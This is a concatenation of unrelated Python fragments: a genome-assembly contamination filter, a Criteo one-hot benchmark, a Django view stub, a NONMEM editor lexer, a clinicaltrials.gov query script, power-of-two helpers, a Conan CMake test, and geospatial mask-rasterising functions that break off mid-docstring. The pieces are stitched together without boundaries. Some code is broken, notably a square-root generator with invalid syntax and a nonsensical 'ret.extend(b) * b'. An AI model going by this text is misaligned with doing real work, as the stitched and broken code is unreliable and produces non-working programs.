format(len(Contigs2Drop), min_coverage, args.mincovpct)) if args.debug: print('Contigs dropped due to coverage: {:,}'.format(','.join(Contigs2Drop))) print('Contigs dropped due to taxonomy: {:,}'.format(','.join(Tax2Drop))) DropFinal = Contigs2Drop + Tax2Drop DropFinal = set(DropFinal) status('Dropping {:,} total contigs based on taxonomy and coverage'.format(len(DropFinal))) with open(args.outfile, 'w') as outfile, open(sourTax, 'rU') as seqin: for record in SeqIO.parse(seqin, 'fasta'): if not record.id in DropFinal: SeqIO.write(record, outfile, 'fasta') numSeqs, assemblySize = fastastats(args.outfile) status('Sourpurged assembly is {:,} contigs and {:,} bp'. format(numSeqs, assemblySize)) if '_' in args.outfile: nextOut = args.outfile.split('_')[0]+'.rmdup.fasta' elif '.' in args.outfile: nextOut = args.outfile.split('.')[0]+'.rmdup.fasta' else: nextOut = args.outfile+'.rmdup.fasta' if checkfile(sourmashTSV): baseinput = os.path.basename(args.input) if '.' in baseinput: baseinput = baseinput.rsplit('.',1)[0] os.rename(sourmashTSV, baseinput+'.sourmash-taxonomy.csv') if not args.debug: SafeRemove(args.workdir) if not args.pipe: status('Your next command might be:\n\tAAFTF rmdup -i {:} -o {:}\n'.format(args.outfile, nextOut)) slst = [1,4,9,16,25,36,49,64,81] def mySqrt(n): for i in range(len(slst)): if n < slst[i]: break yield i rem = n - slst[i] ret = [i] while 1: rem *= 100 for b in range(0,10): if ret.extend(b) * b < rem: continue else break ret = rem - ret.extend(b) s = mySqrt(2) for i in range(10): print s.next() damslab/reproducibility import sys import time import numpy as np import scipy as sp from scipy.sparse import csr_matrix import pandas as pd import math import warnings from sklearn.pipeline import make_pipeline from sklearn.compose import ColumnTransformer from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.base import BaseEstimator, TransformerMixin from sklearn import preprocessing from nimbusml.feature_extraction.categorical import OneHotVectorizer # Make numpy values easier to read. np.set_printoptions(precision=3, suppress=True) warnings.filterwarnings('ignore') #cleaner, but not recommended def readNprep(nRows): # Read the 1M or the 10M dataset if nRows == 1: print("Reading file: criteo_day21_1M") criteo = pd.read_csv("~/datasets/criteo_day21_1M", delimiter=",", header=None) if nRows == 10: print("Reading file: criteo_day21_10M") criteo = pd.read_csv("~/datasets/criteo_day21_10M", delimiter=",", header=None) print(criteo.head()) # Replace NaNs with 0 for numeric and empty string for categorical criteo = criteo.apply(lambda x: x.fillna(0) if x.dtype.kind in 'biufc' else x.fillna('')) pt = [*range(0,14)] criteo[pt] = criteo[pt].astype(float) pt = [*range(14,40)] criteo[pt] = criteo[pt].astype(str) #print(criteo.info()) return criteo def transform(X): # Seperate categorical features print(X.columns) cat = list(X.columns[14:40]) # Rename columns from number to alpha-numeric all_cols = list(X.columns[0:40]) new_cols = ['C' + str(i) for i in all_cols] X.columns = new_cols print(X.head()) cat_cols = ['C' + str(i) for i in cat] # Execute OneHot on all categorical columns # NOTE: the fit_transform call never completes. Killed after long time. 
t_t = time.time() #xf = OneHotVectorizer() << ['C35'] xf = OneHotVectorizer() << cat_cols print(xf.fit_transform(X)) print("Elapsed time for Transform = %s sec" % (time.time() - t_t)) X = readNprep(1) t2 = time.time() transform(X) print("Elapsed time for transformations using mlnet = %s sec" % (time.time() - t2)) junkhp/esuites_database_modification from django.shortcuts import render, redirect, get_object_or_404 from django.views.generic import ListView, DetailView, DeleteView, UpdateView from django import forms from django.urls import reverse_lazy, reverse from django.views import View from django.contrib.auth import authenticate, login, logout from django.contrib.auth.decorators import login_required from django.contrib.auth.mixins import LoginRequiredMixin from pprint import pprint from django.db.models import Q # Create your views here. class IndexView(View): '''トップページを表示''' def get(self, request): template_name = 'esuits/index.html' return render(request, template_name) ############################################################################### # Name: nonmem.py # # Purpose: Define NONMEM syntax for highlighting and other features # # Author: <> # # Copyright: (c) 2008 () # # (c) 2008 (none_yet) # # (c) 2010 () # # License: wxWindows License # ############################################################################### """ FILE: nonmem.py AUTHOR: , , @summary: Lexer configuration module for NONMEM control streams. """ __author__ = " , " __svnid__ = "$Id: _nonmem.py 70229 2012-01-01 01:27:10Z CJP $" __revision__ = "$Revision: 70229 $" #-----------------------------------------------------------------------------# # Imports import wx.stc as stc from pygments.lexer import RegexLexer, include, bygroups from pygments.token import Token, Text, Comment, Operator, \ Keyword, Name, String, Number, Punctuation import re #Local Imports import synglob import syndata #-----------------------------------------------------------------------------# # Style Id's # Style Id's STC_NONMEM_DEFAULT, \ STC_NONMEM_COMMENT, \ STC_NONMEM_NUMBER, \ STC_NONMEM_STRING, \ STC_NONMEM_STRINGEOL, \ STC_NONMEM_OPERATOR, \ STC_NONMEM_NAME, \ STC_NONMEM_ABSTRACTRULE, \ STC_NONMEM_FEATURE, \ STC_NONMEM_CROSSREF, \ STC_NONMEM_PACKAGE, \ STC_NONMEM_KEYWORD, \ STC_NONMEM_KEYWORD_PSEUDO = range(13) #-----------------------------------------------------------------------------# #---- Keyword Specifications ----# # Xtext Keywords KEYWORDS = ("grammar generate import returns enum terminal hidden with as current") TERMINALS = ("ID INT STRING") #---- Syntax Style Specs ----# SYNTAX_ITEMS = [ (STC_NONMEM_DEFAULT, 'default_style'), (STC_NONMEM_COMMENT, 'comment_style'), (STC_NONMEM_NUMBER, 'number_style'), (STC_NONMEM_STRING, 'string_style'), (STC_NONMEM_STRINGEOL, 'stringeol_style'), (STC_NONMEM_OPERATOR, 'operator_style'), (STC_NONMEM_NAME, 'default_style'), (STC_NONMEM_ABSTRACTRULE, 'keyword3_style'), (STC_NONMEM_FEATURE, 'default_style'), (STC_NONMEM_CROSSREF, 'class_style'), (STC_NONMEM_PACKAGE, 'class_style'), (STC_NONMEM_KEYWORD, 'keyword_style'), (STC_NONMEM_KEYWORD_PSEUDO, 'keyword2_style'), ] NONMEM_KEYWORDS = ("ADVAN\d+ BLOCK COMP COND CONDITIONAL DEFDOSE DEFOBS " "DOWHILE ELSE ENDDO ENDIF EXP FILE FIX FIXED ICALL IF " "IGNORE INTER INTERACTION LOG MATRIX MAX MAXEVAL METHOD " "NEWIND NOABORT NOAPPEND NOPRINT NOHEADER ONEHEADER PRINT " "SIG SIGDIGITS SLOW SUBPROBLEMS THEN TOL TRANS1 TRANS2 " "TRANS3 TRANS4 ONLYSIM ENDIF") NONMEM_PARAMS = "DADT ERR EPS ETA THETA" #NONMEM_SPECIAL = "\$COV $DATA $DES $ERROR $EST 
\$INPUT $MODEL $OMEGA $PRED \\$PK $PROB $PROBLEM $SIGMA $SIM $SUB $TABLE $THETA" #-----------------------------------------------------------------------------# class SyntaxData(syndata.SyntaxDataBase): """SyntaxData object for IssueLists This class is primarily intended as an example to creating a custom lexer. """ def __init__(self, langid): super(SyntaxData, self).__init__(langid) # Setup self.SetLexer(stc.STC_LEX_CONTAINER) self.RegisterFeature(synglob.FEATURE_STYLETEXT, StyleText) def GetSyntaxSpec(self): """Syntax Specifications """ return SYNTAX_ITEMS #---- End Required Module Functions ----# def StyleText(_stc, start, end): """Style the text @param _stc: Styled text control instance @param start: Start position @param end: end position """ for index, token, txt in lexer.get_tokens_unprocessed(_stc.GetTextRange(0, end)): # print index, token, txt style = TOKEN_MAP.get(token, STC_NONMEM_DEFAULT) # print "Text=%s, len=%s" % (txt, len(txt)) _stc.StartStyling(index, 0x1f) tlen = len(txt) if tlen: _stc.SetStyling(len(txt), style) TOKEN_MAP = { Token.String : STC_NONMEM_STRING, Token.Comment.Multiline : STC_NONMEM_COMMENT, Token.Comment.Single : STC_NONMEM_COMMENT, Token.Operator : STC_NONMEM_OPERATOR, Token.Punctuation : STC_NONMEM_OPERATOR, Token.Number.Integer : STC_NONMEM_NUMBER, Token.Keyword : STC_NONMEM_KEYWORD, Token.Keyword.Pseudo: STC_NONMEM_KEYWORD_PSEUDO, Token.Name : STC_NONMEM_NAME, Token.Name.AbstractRule : STC_NONMEM_ABSTRACTRULE, Token.Name.Feature : STC_NONMEM_FEATURE, Token.Name.CrossRef : STC_NONMEM_CROSSREF, Token.Name.Package : STC_NONMEM_PACKAGE, Token.Name.Package.EMF : STC_NONMEM_PACKAGE} class NONMEMLexer(RegexLexer): """ Nonmem lexer based on statefull RegexLexer from pygments library. """ name = 'NONMEM' aliases = ['nonmem'] filenames = ['*.ctl'] mimetypes = ['text/x-nonmem'] flags = re.MULTILINE | re.DOTALL # | re.UNICODE #: optional Comment or Whitespace #_ws = r'(?:\s|//.*?\n|/[*].*?[*]/)+' def AltWords(words): """Makes lexer rule for alternative words from the given words list. @param words: string consisting of space separated words @return: string in the form \\bword1\\b|\\bword2\\b|\\bword3\\b... """ return "|".join([ "\\b%s\\b" % w for w in words.split()]) _ident = r'\^?[a-zA-Z_\$][a-zA-Z0-9_]*' tokens = { 'root': [ (include('first')), (_ident + r'(\.' + _ident + r')+', Name.Package), ('(' + _ident + r')(\s*)(returns)', bygroups(Name.AbstractRule, Text.Whitespace, Keyword), 'parserrule'), ('(' + _ident + r')(\s*)(:)', bygroups(Name.AbstractRule, Text.Whitespace, Punctuation), 'parserrule'), (_ident, Name), ], 'first': [ (r';[^\n]*$', Comment.Single), (r'\$[A-Z]+', Name.Package), (r'[ \t]+', Text.Whitespace), (r'"(\\\\|\\"|[^"])*"', String), (r"'(\\\\|\\'|[^'])*'", String), (r'\*|\?|\+|!|\||=|\?=|\+=|\.\.|->', Operator), (r'[()\[\]{}:]', Punctuation), (r'[0-9]+', Number.Integer), (AltWords(NONMEM_KEYWORDS), Keyword), (AltWords(NONMEM_PARAMS), Keyword.Pseudo), # (AltWords(NONMEM_SPECIAL), Name.Package), ], 'parserrule': [ (include('first')), ('(' + _ident + r'(\.' + _ident + r')?)([ \t]*)(=|\?=|\+=)', bygroups(Name.Feature, Text.Whitespace, Operator)), (_ident + r'(\.' 
+ _ident + r')+', Name.Package), (_ident, Name.CrossRef), ], } lexer = NONMEMLexer() if __name__=='__main__': import codecs, sys ftext = codecs.open(sys.argv[1], "r", "utf-8") text = ftext.read() ftext.close() line=1 for index, token, txt in lexer.get_tokens_unprocessed(text): if token is Token.EndOfLine: line += 1 print( line, token, txt) 0 import json import urllib.request import itertools import statistics import pandas as pd from nltk.tokenize import word_tokenize stack=[] name = input('What is your problem dude ? ') query=word_tokenize(name) x = "+".join(query) myTuple = ("https://clinicaltrials.gov/api/query/full_studies?expr=",x,"&min_rnk=1&max_rnk=100&fmt=json") #url="https://clinicaltrials.gov/api/query/full_studies?expr=heart+attack&min_rnk=1&max_rnk=100&fmt=json" y ="".join(myTuple) url=y list1=[] list2=[] list3=[] with urllib.request.urlopen(url) as url: s = url.read() data = json.loads(s) #data is dictonart datatype data= data.get('FullStudiesResponse').get('FullStudies') j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionMeshList').get('ConditionMesh'): list1.append(i.get('ConditionMeshTerm')) #print(i.get('ConditionMeshTerm')) j=j+1 j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionAncestorList').get('ConditionAncestor'): list2.append(i.get('ConditionAncestorTerm')) #print(i.get('ConditionMeshTerm')) j=j+1 j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionBrowseLeafList').get('ConditionBrowseLeaf'): list3.append(i.get('ConditionBrowseLeafName')) #print(i.get('ConditionMeshTerm')) j=j+1 #print(list1,list2,list3) list1.extend(list2) list1.extend(list3) s = [] for i in list1: if i not in s: s.append(i) print(s) print("end") def is_power_of_2(num): """ Returns whether num is a power of two or not :param num: an integer positive number :return: True if num is a power of 2, False otherwise """ return num != 0 and ((num & (num - 1)) == 0) def next_power_of_2(x): """ Returns the first power of two >= x, so f(2) = 2, f(127) = 128, f(65530) = 65536 :param x: :return: """ # NOTES for this black magic: # * .bit_length returns the number of bits necessary to represent self in binary # * x << y means 1 with the bits shifted to the left by y, which is the same as multiplying x by 2**y (but faster) return 1 << (x - 1).bit_length() import os import platform import textwrap import unittest from nose.plugins.attrib import attr from conans.test.utils.tools import TestClient from conans.util.files import load @attr('slow') class CMakeFindPathMultiGeneratorTest(unittest.TestCase): def test_native_export_multi(self): """ bye depends on hello. 
Both use find_package in their CMakeLists.txt The consumer depends on bye, using the cmake_find_package_multi generator """ c = TestClient() project_folder_name = "project_targets" assets_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "assets/cmake_find_package_multi") c.copy_from_assets(assets_path, ["bye", "hello", project_folder_name]) # Create packages for hello and bye for p in ("hello", "bye"): for bt in ("Debug", "Release"): c.run("create {} user/channel -s build_type={}".format(p, bt)) with c.chdir(project_folder_name): # Save conanfile and example conanfile = textwrap.dedent(""" [requires] bye/1.0@user/channel [generators] cmake_find_package_multi """) example_cpp = textwrap.dedent(""" #include #include "bye.h" int main() { bye(); } """) c.save({"conanfile.txt": conanfile, "example.cpp": example_cpp}) with c.chdir("build"): for bt in ("Debug", "Release"): c.run("install .. user/channel -s build_type={}".format(bt)) # Test that we are using find_dependency with the NO_MODULE option # to skip finding first possible FindBye somewhere self.assertIn("find_dependency(hello REQUIRED NO_MODULE)", load(os.path.join(c.current_folder, "byeConfig.cmake"))) if platform.system() == "Windows": c.run_command('cmake .. -G "Visual Studio 15 Win64"') c.run_command('cmake --build . --config Debug') c.run_command('cmake --build . --config Release') c.run_command('Debug\\example.exe') self.assertIn("Hello World Debug!", c.out) self.assertIn("bye World Debug!", c.out) c.run_command('Release\\example.exe') self.assertIn("Hello World Release!", c.out) self.assertIn("bye World Release!", c.out) else: for bt in ("Debug", "Release"): c.run_command('cmake .. -DCMAKE_BUILD_TYPE={}'.format(bt)) c.run_command('cmake --build .') c.run_command('./example') self.assertIn("Hello World {}!".format(bt), c.out) self.assertIn("bye World {}!".format(bt), c.out) os.remove(os.path.join(c.current_folder, "example")) 10-100 from ..utils.core import _check_df_load, _check_geom, _check_crs from ..utils.core import _check_skimage_im_load, _check_rasterio_im_load from ..utils.geo import gdf_get_projection_unit, reproject from ..utils.geo import geometries_internal_intersection from ..utils.tile import save_empty_geojson from .polygon import georegister_px_df, geojson_to_px_gdf, affine_transform_gdf import numpy as np from shapely.geometry import shape from shapely.geometry import Polygon import geopandas as gpd import pandas as pd import rasterio from rasterio import features from affine import Affine from skimage.morphology import square, erosion, dilation import os from tqdm import tqdm def df_to_px_mask(df, channels=['footprint'], out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, **kwargs): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. channels : list, optional The mask channels to generate. There are three values that this can contain: - ``"footprint"``: Create a full footprint mask, with 0s at pixels that don't fall within geometries and `burn_value` at pixels that do. - ``"boundary"``: Create a mask with geometries outlined. 
Use `boundary_width` to set how thick the boundary will be drawn. - ``"contact"``: Create a mask with regions between >= 2 closely juxtaposed geometries labeled. Use `contact_spacing` to set the maximum spacing between polygons to be labeled. Each channel correspond to its own `shape` plane in the output. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. burn_value : `int` or `float` The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. kwargs Additional arguments to pass to `boundary_mask` or `contact_mask`. See those functions for requirements. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. Shape will be ``(shape[0], shape[1], len(channels))``, with channels ordered per the provided `channels` `list`. """ if isinstance(channels, str): # e.g. 
if "contact", not ["contact"] channels = [channels] if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') mask_dict = {} if 'footprint' in channels: mask_dict['footprint'] = footprint_mask( df=df, reference_im=reference_im, geom_col=geom_col, do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) if 'boundary' in channels: mask_dict['boundary'] = boundary_mask( footprint_msk=mask_dict.get('footprint', None), reference_im=reference_im, geom_col=geom_col, boundary_width=kwargs.get('boundary_width', 3), boundary_type=kwargs.get('boundary_type', 'inner'), burn_value=burn_value, df=df, affine_obj=affine_obj, shape=shape, out_type=out_type ) if 'contact' in channels: mask_dict['contact'] = contact_mask( df=df, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj, shape=shape, out_type=out_type, contact_spacing=kwargs.get('contact_spacing', 10), burn_value=burn_value, meters=kwargs.get('meters', False) ) output_arr = np.stack([mask_dict[c] for c in channels], axis=-1) if reference_im: reference_im = _check_rasterio_im_load(reference_im) if out_file: meta = reference_im.meta.copy() meta.update(count=output_arr.shape[-1]) meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: # I hate band indexing. for c in range(1, 1 + output_arr.shape[-1]): dst.write(output_arr[:, :, c-1], indexes=c) return output_arr def footprint_mask(df, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. 
out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. """ # start with required checks and pre-population of values if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0 and not out_file: return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(df[geom_col], df[burn_field].astype('uint8'))) else: feature_list = list(zip(df[geom_col], df[burn_field].astype('float32'))) else: feature_list = list(zip(df[geom_col], [burn_value]*len(df))) if len(df) > 0: output_arr = features.rasterize(shapes=feature_list, out_shape=shape, transform=affine_obj) else: output_arr = np.zeros(shape=shape, dtype='uint8') if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') meta.update(nodata=0) with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def boundary_mask(footprint_msk=None, out_file=None, reference_im=None, boundary_width=3, boundary_type='inner', burn_value=255, **kwargs): """Convert a dataframe of geometries to a pixel mask. Note ---- This function requires creation of a footprint mask before it can operate; therefore, if there is no footprint mask already present, it will create one. In that case, additional arguments for :func:`footprint_mask` (e.g. ``df``) must be passed. By default, this function draws boundaries *within* the edges of objects. To change this behavior, use the `boundary_type` argument. Arguments --------- footprint_msk : :class:`numpy.array`, optional A filled in footprint mask created using :func:`footprint_mask`. If not provided, one will be made by calling :func:`footprint_mask` before creating the boundary mask, and the required arguments for that function must be provided as kwargs. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored boundary_width : int, optional The width of the boundary to be created **in pixels.** Defaults to 3. 
boundary_type : ``"inner"`` or ``"outer"``, optional Where to draw the boundaries: within the object (``"inner"``) or outside of it (``"outer"``). Defaults to ``"inner"``. burn_value : `int`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. **kwargs : optional Additional arguments to pass to :func:`footprint_mask` if one needs to be created. Returns ------- boundary_mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and the same value as the footprint mask `burn_value` for the boundaries of each object. """ if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') if reference_im: reference_im = _check_rasterio_im_load(reference_im) # need to have a footprint mask for this function, so make it if not given if footprint_msk is None: footprint_msk = footprint_mask(reference_im=reference_im, burn_value=burn_value, **kwargs) # perform dilation or erosion of `footprint_mask` to get the boundary strel = square(boundary_width) if boundary_type == 'outer': boundary_mask = dilation(footprint_msk, strel) elif boundary_type == 'inner': boundary_mask = erosion(footprint_msk, strel) # use xor operator between border and footprint mask to get _just_ boundary boundary_mask = boundary_mask ^ footprint_msk # scale the `True` values to burn_value and return boundary_mask = boundary_mask > 0 # need to binarize to get burn val right output_arr = boundary_mask.astype('uint8')*burn_value if out_file: meta = reference_im.meta.copy() meta.update(count=1) meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def contact_mask(df, contact_spacing=10, meters=False, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255): """Create a pixel mask labeling closely juxtaposed objects. Notes ----- This function identifies pixels in an image that do not correspond to objects, but fall within `contact_spacing` of >1 labeled object. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. contact_spacing : `int` or `float`, optional The desired maximum distance between adjacent polygons to be labeled as contact. Will be in pixel units unless ``meters=True`` is provided. meters : bool, optional Should `width` be defined in units of meters? Defaults to no (``False``). If ``True`` and `df` is not in a CRS with metric units, the function will attempt to transform to the relevant CRS using ``df.to_crs()`` (if `df` is a :class:`geopandas.GeoDataFrame`) or using the data provided in `reference_im` (if not). out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. 
geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Returns ------- output_arr : :class:`numpy.array` A pixel mask with `burn_value` at contact points between polygons. """ if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0 and not out_file: return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if reference_im: reference_im = _check_rasterio_im_load(reference_im) buffered_geoms = buffer_df_geoms(df, contact_spacing/2., meters=meters, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj) buffered_geoms = buffered_geoms[geom_col] # create a single multipolygon that covers all of the intersections if len(df) > 0: intersect_poly = geometries_internal_intersection(buffered_geoms) else: intersect_poly = Polygon() # handle case where there's no intersection if intersect_poly.is_empty: output_arr = np.zeros(shape=shape, dtype='uint8') else: # create a df containing the intersections to make footprints from df_for_footprint = pd.DataFrame({'shape_name': ['overlap'], 'geometry': [intersect_poly]}) # catch bowties df_for_footprint['geometry'] = df_for_footprint['geometry'].apply( lambda x: x.buffer(0) ) # use `footprint_mask` to create the overlap mask contact_msk = footprint_mask( df_for_footprint, reference_im=reference_im, geom_col='geometry', do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) footprint_msk = footprint_mask( df, reference_im=reference_im, geom_col=geom_col, do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) contact_msk[footprint_msk > 0] = 0 contact_msk = contact_msk > 0 output_arr = contact_msk.astype('uint8')*burn_value if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def road_mask(df, width=4, meters=False, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None, 
min_background_value=None, verbose=False): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. width : `float` or `int`, optional The total width to make a road (i.e. twice x if using road.buffer(x)). In pixel units unless `meters` is ``True``. meters : bool, optional Should `width` be defined in units of meters? Defaults to no (``False``). If ``True`` and `df` is not in a CRS with metric units, the function will attempt to transform to the relevant CRS using ``df.to_crs()`` (if `df` is a :class:`geopandas.GeoDataFrame`) or using the data provided in `reference_im` (if not). out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. min_background_val : int Minimum value for mask background. Optional, ignore if ``None``. Defaults to ``None``. verbose : str, optional Switch to print relevant values. Defaults to ``False``. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. 
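Examples
--------
A minimal, illustrative call (``roads.geojson`` and ``image_tile.tif`` are
hypothetical inputs, not files shipped with this module)::

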